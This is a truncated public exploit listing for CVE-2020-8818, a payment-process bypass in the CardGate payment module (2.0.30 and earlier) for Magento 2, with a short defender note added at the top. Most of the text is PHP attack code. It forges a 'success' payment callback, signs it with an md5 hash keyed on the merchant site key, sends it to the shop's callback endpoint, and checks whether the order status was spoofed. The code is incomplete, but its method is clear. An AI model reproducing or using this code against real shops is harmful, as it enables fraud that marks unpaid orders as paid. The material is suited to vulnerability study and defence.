# Exploit Title: Magento WooCommerce CardGate Payment Gateway 2.0.30 - Payment Process Bypass
# Discovery Date: 2020-02-02
# Public Disclosure Date: 2020-02-22
# Exploit Author: GeekHack
# Vendor Homepage: https://www.cardgate.com (www.curopayments.com)
# Software Link: https://github.com/cardgate/magento2/releases/tag/v2.0.30
# Version: <= 2.0.30
# Tested on: Magento 2.3.4 + CardGate Payment Gateway Module 2.0.30
# CVE: CVE-2020-8818
#
# Note: this copy of the listing is truncated. Everything from the opening PHP tag up to the start of the $payload array is missing, so the fragment below is not runnable as shown.
# For defenders: the visible part sends a 'success' callback to /cardgate/payment/callback whose md5 hash is keyed with $aConfigData['site_key'], and its error text implies the merchant settings were replaced in the missing earlier step. On affected versions (<= 2.0.30), review the module's merchant and site-key settings for unexpected changes, reconcile orders marked as paid against the gateway's own transaction records, and update to a vendor release that addresses CVE-2020-8818.
$_REQUEST['testmode'], 'reference' => ORDER, 'transaction' => 'T' . str_pad(time(), 11, random_int(0, 9)), 'currency' => ORDER_CURRENCY, 'amount' => ORDER_AMOUNT * 100, 'status' => 'success', 'code' => 200, 'pt' => ORDER_PAYMENT_TYPE ]; $payload['hash'] = md5( (!empty($payload['testmode']) ? 'TEST' : '') . $payload['transaction'] . $payload['currency'] . $payload['amount'] . $payload['reference'] . $payload['code'] . $aConfigData['site_key'] ); $response = doRequest(TARGET . '/cardgate/payment/callback', $payload, 'GET'); if ($response == $payload['transaction'] . '.' . $payload['code']) { die($aConfigData['merchant'] . '.' . $aConfigData['site_id'] . '.200'); } else { throw new Exception("Unable to spoof order status, but merchant settings was updated successfully ($response)"); } } else { die($aConfigData['merchant'] . '.' . $aConfigData['site_id'] . '.200'); } } else { throw new Exception("It seems target is not vulnerable ($response)"); } } catch (\Exception $oException_) { die(htmlspecialchars($oException_->getMessage())); } }